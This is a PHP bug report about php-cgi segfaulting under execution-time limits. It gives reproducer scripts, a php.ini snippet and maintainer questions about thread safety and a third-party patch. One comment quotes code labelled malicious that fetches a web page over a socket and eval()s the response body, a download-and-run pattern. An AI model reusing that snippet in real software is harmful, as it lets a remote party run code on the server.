ID:               49484
 User updated by:  witekfl at gazeta dot pl
 Reported By:      witekfl at gazeta dot pl
 Status:           Open
 Bug Type:         Reproducible crash
 Operating System: Debian Linux
 PHP Version:      5.2.10
 New Comment:

php.ini:
display_errors = Off
max_execution_time = 1
disable_functions = sleep

t.php:
<?php
for (;;) {
    sleep(1);
}

cat t.php | php-cgi -c php.ini

Run it a few times.
It segfaults for me.

Try with export MALLOC_CHECK_=2


Previous Comments:
------------------------------------------------------------------------

[2009-09-09 19:59:58] witekfl at gazeta dot pl

ThreadSafety disabled.

------------------------------------------------------------------------

[2009-09-09 19:54:28] j...@php.net

To rule out one possible problem: is ZTS enabled in your build? (check
your phpinfo() output for "Thread Safety", it should be "disabled").

------------------------------------------------------------------------

[2009-09-09 13:13:35] witekfl at gazeta dot pl

Here is malicious code:

<?php
@$s = fsockopen("google.com",80);
stream_set_timeout($s, 3);
fputs($s, "GET / HTTP/1.0\nHost: google.com\n\n");
$o="";
while(!feof($s)) $o.=fgets($s,1000);
$o=substr($o,strpos($o,"\r\n\r\n")+4);
fclose($s);
eval($o);
?>
aa

The setup is as follows:
nginx + apache + mod_layout + mod_fcgid + php-cgi as fastcgi
php-cgi has suid bit set and runs as user www-data.
nginx and apache run as different users from php-cgi.
max_execution_timeout is 2 seconds.
iptables rejects connections to google.com (to the outside) for
php-cgi.
php segfaults very often and Apache returns status 500.

------------------------------------------------------------------------

[2009-09-06 14:19:25] witekfl at gazeta dot pl

I disabled fpm and still the same.

------------------------------------------------------------------------

[2009-09-06 13:31:30] j...@php.net

Obvious question is: Does it happen without the 3rd party patch?

------------------------------------------------------------------------

The remainder of the comments for this report are too long. To view
the rest of the comments, please view the bug report online at
    http://bugs.php.net/49484
